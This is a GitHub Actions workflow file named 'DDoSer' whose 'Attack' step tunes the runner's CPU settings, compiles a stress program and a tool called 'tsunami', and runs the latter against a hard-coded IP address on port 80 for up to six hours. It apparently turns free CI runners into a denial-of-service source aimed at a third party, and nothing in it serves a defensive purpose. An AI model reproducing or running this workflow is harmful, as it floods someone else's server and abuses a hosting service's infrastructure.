name: DDoSer
on:
  workflow_dispatch:
  push:
    branches: [ main ]

jobs:
  run-main:
    timeout-minutes: 360   # Максимум на GitHub-hosted runner (6 часов)
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v5

      - name: Attack
        run: |
          sudo sed -i 's/^GRUB_CMDLINE_LINUX_DEFAULT="/&amd_pstate=active /' /etc/default/grub; sudo update-grub; sudo modprobe -v amd_pstate; sudo modprobe -v acpi_cpufreq; echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor > /dev/null; echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/energy_performance_preference > /dev/null; grep . /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor /sys/devices/system/cpu/cpu0/cpufreq/energy_performance_preference
          clang++ -O3 -std=c++17 cpu_stress.cpp -o cpu_stress -lpthread
          sudo ./cpu_stress
          cat /proc/sys/net/core/somaxconn
          gcc -std=c2x -march=native -O3 -o tsunami tsunami.c -pthread
          sudo ./tsunami 195.154.210.21 80 4
